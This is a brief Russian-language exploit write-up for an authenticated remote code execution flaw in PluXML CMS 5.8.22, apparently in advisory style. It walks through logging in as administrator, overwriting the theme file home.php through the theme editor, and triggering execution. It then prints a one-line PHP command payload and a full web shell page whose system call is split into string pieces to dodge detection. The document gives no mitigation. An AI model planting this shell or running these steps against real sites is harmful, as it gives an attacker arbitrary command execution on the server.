
Критическая уязвимость удаленного выполнения кода (RCE) обнаружена в CMS PluXML версии 5.8.22. Эта уязвимость позволяет аутентифицированным администраторам выполнять произвольный PHP-код на веб-сервере, загружая вредоносные PHP-оболочки через функциональность редактора тем.
Пошаговая эксплуатация
Аутентификация: Войдите в панель администратора PluXML с действительными учетными данными администратора Перейдите в редактор тем:
Внедрите вредоносную нагрузку:
Замените содержимое файла home.php на PHP-веб-шелл
Пример нагрузки: <?php system($_GET['cmd']); ?>
Сохраните измененный файл
Запустите выполнение:
Обратная оболочка

Нагрузка веб-шелла
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input
type="TEXT"
name="cmd"
autofocus
id="cmd"
size="80"
>
<input
type="SUBMIT"
value="Execute"
>
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
$func_name = "sys" . "tem";
$func_name($_GET['cmd']);
}
?>
</pre>
</body>
</html>

